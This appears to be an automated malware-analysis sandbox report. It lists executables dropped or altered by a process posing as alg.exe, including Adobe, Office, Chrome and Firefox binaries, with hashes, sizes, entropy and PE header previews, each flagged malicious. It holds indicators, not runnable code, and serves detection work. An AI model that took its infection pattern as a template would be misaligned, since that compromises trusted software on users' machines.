Encrypted:	false
SSDEEP:	24576:xxwSJhkrmZsMsqjnhMgeiCl7G0nehbGZpbD:xy+krKs4Dmg27RnWGj
MD5:	6723480D53AA350290D2BB95C7A24C95
SHA1:	0077B6599C7C6312A228F02F66168475B43D4DB5
SHA-256:	BBCBE5748FB87EA5C6CBEB10064E5D75C9E8207B2AD5AF03B0D43E45F89031F7
SHA-512:	A09C18410BEAEE3FDCD0A21540DADBD2A76AC5B0C54FB4E85D65F487042B809A3A8DFEC554855C3D9326B82B113A0AE63D575E1BD76C37F331EFA17824CF74DD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@....................................N+.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1649152
Entropy (8bit):	5.63272711706388
Encrypted:	false
SSDEEP:	24576:THQJLIRgvsnNdsqjnhMgeiCl7G0nehbGZpbD:THQJL34BDmg27RnWGj
MD5:	A0CDFD098B24925BB9174A9C6816F440
SHA1:	5E7F9CD6E6A4A8E1C6D1A3EEE70B7B9EFBBCAE18
SHA-256:	4A370135FFF39DC9798F22D85CAC3602539302AD3739F0D6C43D758A937DE588
SHA-512:	02430622D0DC6D550F0E2F6CB9D825BD50F692C93DFB9A66EF965810FDE163E049D62AC0F07D7B34D450A50251F83EE390BC6B630B897ABB04FC293066D0A975
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@....................................Z..... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.450964923485017
Encrypted:	false
SSDEEP:	49152:qUZujDjDjDjXmXgoz2PsapFQrC7dRpqbeE8U2IzwDt+bdro4O8b8ITDnlggyJ1kE:FWmXL6DEC7dRpKuDQbgeD527BWG
MD5:	35316BF36FDE7E18783FC432D9734D45
SHA1:	E24C9D4E6A372C29ADDD959AC1814FB2B60CDEC7
SHA-256:	FF3F006F53DB44BD0B82C222A5D26AEBA02425D600D6001F09B9B1993F6F3D50
SHA-512:	46FA4C23D2B6D9388318B362E68196BF574C933A1ACC83ACBBC19BD61660C8B224DF184AA07C62B8A8C770D691A41536949641F261577BDC1CD16D2B77D25A41
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R......tR..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.972781576074373
Encrypted:	false
SSDEEP:	98304:wrZ23AbsK6Ro022JjL2WEiVqJZ1D527BWG:6JADmmxL2WEoCZ1VQBWG
MD5:	8A23D992295D717B429CB18ABFEE0F82
SHA1:	78FE268CFBF661AA4174DEC4540C44510669E5CB
SHA-256:	93C220D565D1F4C1406EBD069E58825D28C9B67F989C07C246C59CF2F4547BC0
SHA-512:	D514F9A983E1C1791B7DED91FD62CC03A5EF5FEED548DC6335B25FEC5FB6F32DA3746375B2C4CCB61F6B361A4C42616177E8BB4E6EF6D6482A5ED02C1E1A3F91
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......1.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.2049098965381635
Encrypted:	false
SSDEEP:	24576:yfrYY42wd7hlOw9fpkEE64csqjnhMgeiCl7G0nehbGZpbD:rz9xrSIDmg27RnWGj
MD5:	FBD0F724B3D3ADA3700C8A22F5DBD972
SHA1:	98667D721BDA82D10D5E870B2667C6478D20285E
SHA-256:	AB535766FC68AB8242E51437984CD039CE9630B64B35B8E3EFE6A4E3C7481272
SHA-512:	4D4F3972500E734D7BA9DBBFB7E6AA65DF815329D7373CC6133ED5A27A15C0FA3B32871D646207FD0D0EA43E8F0EEBBD60D57E2C64C3E3D27F3ABF83521F0423
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. .......m.... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.2729301856115995
Encrypted:	false
SSDEEP:	12288:NwkNKiZ+R2GGNUbTF5fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:NzNKUE5fsqjnhMgeiCl7G0nehbGZpbD
MD5:	9168835342A0FD838789EFA3B90F9738
SHA1:	4833A4C67022C26A1784A6E806ADF01D78FA2E6E
SHA-256:	2C21E0FA729859078459A1B15B3B811FC1D84C0C4F9F1BAA41F1897C0D550F34
SHA-512:	69AE619C9E64A27B9E8205C99594BCDF01A05F3ED4E2E0149BFEBD55227C689122078C785420BB8F1A2007BFDE4DAD2023F5539EE5AEF20CA51FE23F23595D1C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P....../..... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.5743303066839545
Encrypted:	false
SSDEEP:	98304:+ALuzDKnxCp3JKNrPJzruaI6HMaJTtGbiD527BWG:paGg3cFPIaI6HMaJTtGbiVQBWG
MD5:	0AE1235905480BFCA57658A78CC87474
SHA1:	066EB66DA5B0ABF6B1A88147D618F198688D3C01
SHA-256:	76EECFF797051E9042966FC3E188FC4BF3C019247C40DB9DE1CEED37C6191BF6
SHA-512:	FAF8183741AD3F1F59F5AB9696D1C4CAD87C484126FC26336B9183DE9390708A1C54AE55D283F76606A27DBC5DB4C38E75B4F1CB398797684820BE286D0FF12C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......gY... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1312768
Entropy (8bit):	5.3560676356435755
Encrypted:	false
SSDEEP:	24576:iXr/SVMxWgsqjnhMgeiCl7G0nehbGZpbD:a1x1Dmg27RnWGj
MD5:	5FF1F1DE959274FCBC54753720F552D4
SHA1:	FDDC46D0F4AAE0741CB17DD6110A03C9120E8A61
SHA-256:	FDCE4669BD4098D1DD0338A53A1BDCE5B1814362D0BF8E0AF0D5FB025CA304E2
SHA-512:	94C9940730EE4A81B45A4109127EAACDB6B246D7BC60AA0B1D4DD2C3478232890B22A9848074F9EDCC98ADA9B8725CC9E3A4AE9402A95926AD4E3D6478722106
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P.......r........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248635892997952
Encrypted:	false
SSDEEP:	196608:zhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOOVQBWG:zhRCpGpMJMrbp8JjpNdNlc5KB
MD5:	4418B510D0784C493F7A106C55174C57
SHA1:	8327A5C1D6B7FCDD20410CB2937A073AD90F4ED0
SHA-256:	CF3DB3E407E8DEE5E28CDE7CC526F8CEAE98DFDE5AD0EE6D39827E3F73CE31C5
SHA-512:	1D5EE8F731D1B1B9F058043234AADE5DF877E15F9585CD21144BE32AA44F4A582F7994E5E3D9099C431ACA0774BAAFAFB29F2728666D00A1BE32ACC337F440AA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.789004054299794
Encrypted:	false
SSDEEP:	49152:F83pZ3kd0CuEeN0LUmRXzYs65mmDmg27RnWGj:1KuUQY15xD527BWG
MD5:	760C3B43BE5509CD85A22C1F0CF07711
SHA1:	ECA5D7F42949AC3080BDE38D7F596B5327446A49
SHA-256:	8943EA4DA15A4BBD1DD7C95DFCDCC3191C256CCF94D20E0378A1904A8AB83B63
SHA-512:	0567E010D37E7F83C9D5E50507939D3FFCB4FA34C16F567C7240044FA627446B91583C7FFCAB5F958F0D4D16AAFF078BE97EF2213EE129BAC49CA8C9BA58115B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.6708264160792545
Encrypted:	false
SSDEEP:	49152:dErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+M9:LA4oGlcR+glEdOPKzgVZ8D527BWG
MD5:	543985451DFA92A44BDF404415291453
SHA1:	47BFDB6D4EAE2B3958FE50522734D94BA86CB036
SHA-256:	8C90CF857BFDEA6E5EAD322EE22B13597EAF9E8D89FFD6F4087980590C5C672C
SHA-512:	C781C969F03ABE7905A9B6B012898C7F8CB23E61463FE66634D60B57E897C616CBAF00D0483F1A9FFD57C4F0E7B36A692E8BE1335B5F446A330129CB2AF23898
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.....3.L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829759915662043
Encrypted:	false
SSDEEP:	49152:w8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKS:7v2gM+qwXLg7pPgw/DSZHWD527BWG
MD5:	491E888F8827F5105C156DB9558F71E5
SHA1:	644A3E3CB17ED36A66C852867F6FEFBE62877A28
SHA-256:	99204C05E6FD13F1E5F86E3DB2B460963D54DF6DB52BD1D9A6ECAA72A5EE5410
SHA-512:	5416C862ABE01BB0E988A6E6AFF4A8DFB9676A8206DFC04ECE8F5D213241DBC036E45AD6D97BC1939E0DB4EBAA0E12AD1DAD041477CBB315E63A8779FA1785C7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829768134281998
Encrypted:	false
SSDEEP:	49152:L8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKS:Kv2gM+qwXLg7pPgw/DSZHWD527BWG
MD5:	8B4F85792010E447F442AB92FFE899D3
SHA1:	0DDCA3B7B461E62AF2FC8DE1D90B1F5B457B283D
SHA-256:	6D5A02B7A3E2C89FBFDE6B7448695C012237041DE3D86A7DC48B3D7503EAD249
SHA-512:	E25AF1890875FB54FF8C56BB3E0492A4BFB01ABC47A30C8F2F680944128BD4B7A8D3955B9A75BD5EADC78758F12BB2AB3D253E2AB0E4EB0C6995F50263F5DA21
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.953572235961014
Encrypted:	false
SSDEEP:	24576:EtjqL8fH+8aUbp8D/8+xyWA1sqjnhMgeiCl7G0nehbGZpbD:wjKK+81FI/8zPDmg27RnWGj
MD5:	C95EB1A9178123298DDB12CCB2AACE87
SHA1:	F650F65F9124BF4400A900CB197BE8A268ED3324
SHA-256:	41E251E761DAC339514F4627B977B96ACEFC6D366DABE7FCEFE82C3624274687
SHA-512:	16D335A10D6D7B76B4D74B25FAAE7B5C322AACA181A3BE2A82D230CAD6454F6FB06126C34568FF3405307F3634B0BF69275BDD61874E9C731317228B039B5D9A
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P".......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.032390455285617
Encrypted:	false
SSDEEP:	49152:rAMsOu3JfCIGnZuTodRFYKBrFDbWpZDmg27RnWGj:rAMa38ZuTS8D527BWG
MD5:	29C2F8928CB02C65F137A28161B17B27
SHA1:	324C5AE7195EDF750F929E48D2C9007085DD1150
SHA-256:	D6A4DBCAE214A27C3102283A0E03585921B106CF07ECC5383B602ED94DF4A33E
SHA-512:	002CFC097C9D616D4BDB72F8C7DA7B886F50AE1DE09DD8A32A45E124A7EAD7B9905DB1549EA4912E69A09D0C0A9A5E61018505F5033EAB3F2B0050A4724340B5
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.10433471422821
Encrypted:	false
SSDEEP:	24576:CwbK7tnhD4aH6wD2Krx5NgOOagQE8JxsqjnhMgeiCl7G0nehbGZpbD:CSK7Fhslq2EPfOGEYDmg27RnWGj
MD5:	0FD22F3BB93C0822BEF9D169D0CED581
SHA1:	826E739B7E99A73E26D4DEB1435F8A731F91174B
SHA-256:	7F351642105BC4FC5F5D3AFC697BDA00FDFDF70C1490E8578BFC18DD4FF8AF38
SHA-512:	6CBA10235AA0B19AB1ECCBD0293B320805F25296ECD31846F5B9110D7F778E39B86A7C49F1E78648F9A87087BCDD4300DCEBA8D2E237D4B3EBA73A3FCAE725C5
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.1580596750357905
Encrypted:	false
SSDEEP:	24576:MKI7Twj5KDHxJ1FxyD+/wsG18bbQhsqjnhMgeiCl7G0nehbGZpbD:Mv7e0j31mD+/wDGb6Dmg27RnWGj
MD5:	09C218A0F607E2C32EB5F9A4DFEA956F
SHA1:	B638E79551E311E9265D8A7D5DB5A034E1EFE01B
SHA-256:	41B64641DD138959FD07A6B6A4956501B59036DB81F6CF6D852EAB3F15C874BA
SHA-512:	52F2AB237E91F6F951382B0F59F613E8EDA25814F2D4188CCE095EDDBA94B370B8454D8663CE6A68B745AB86199E20C698142E5BE66A0E17DA4437860DE1E8E0
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1378304
Entropy (8bit):	5.377434954495419
Encrypted:	false
SSDEEP:	12288:RQUVPDHhSiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:CyhSisqjnhMgeiCl7G0nehbGZpbD
MD5:	5A87F0E67A41C4CEF2C3625D0AC92E04
SHA1:	8FA58CC8173AE71C9C6CEC2B3C1653315BDF3ADE
SHA-256:	E0F60D259B5C939B4341A1AF97CB677EEC8ABF73C17C5730B5551A145A2C095C
SHA-512:	D015141ADE843A7346A9F3AC4C712BF5068F73AA44C81C9DEC752367A324FA8581AE3F02B131ACC9FAB2DC85B222A59FED6641C556CD398516A1E8DD241908EC
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p............ ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.222098054966253
Encrypted:	false
SSDEEP:	24576:CsFfc1VyFn5UQn652bO4H5sqjnhMgeiCl7G0nehbGZpbD:CsFcIn5rJLDmg27RnWGj
MD5:	D0EDBCB9FC6B6B4DCF2C1FDCACC54A8D
SHA1:	3A5B3EFAD8D794341617BE212B9FE8268EB3E757
SHA-256:	B92FB40F53590A4CC45DD5F8ABC52FE11E3BA50602115F5491EF4A7CB6422012
SHA-512:	4494F574E3382113F656FDDB996D27853C085163CBE4F92FEA77C10E082833977D6A15135158B2464948A5A1293B1F989C716A773915C9338E7C5E5F7966844F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.494270507632922
Encrypted:	false
SSDEEP:	24576:st9o6p4xQbiKI69wpemIwpel9+sqjnhMgeiCl7G0nehbGZpbD:st9faQbtl2peapelwDmg27RnWGj
MD5:	BAD67AAFE633EEBE05623D18C97A8690
SHA1:	F87626F1716C1C40564E91B4052E507440E574B4
SHA-256:	2BE30B7C4483A08946CA6A32E0D490B7A5947C676595D7A65C1B3F36671B8478
SHA-512:	41C6702ED540274AAFA07B3332F383FE84AC4978612B43C8D51D19D0490DF1B0FDCF655BA5C10DDEF2516F440E8B8342F1776C146746CA2FE32B4EA5F1BB2519
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.34783033376978
Encrypted:	false
SSDEEP:	24576:UQVTZu0JhsqjnhMgeiCl7G0nehbGZpbD:rVTZugDmg27RnWGj
MD5:	A308752F70E302FC22F0AD3E5E4DA357
SHA1:	31F5840140C0BE9091F70DD9CFDA4ADA72C92F5E
SHA-256:	73F79E3013230D2AEEFC8DFB8D8A327965E5181D242F84ABF8EF2E051CC354F2
SHA-512:	026F16B8DC6FE923AB360494EE9D3B1FA2C977F3254E71E6DC177C6801A2DB9FE9E89BEF28F1C0723816F62EFC3870CE769EA55ED7556B785FDFD296E5C0A5E7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......T.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Download File

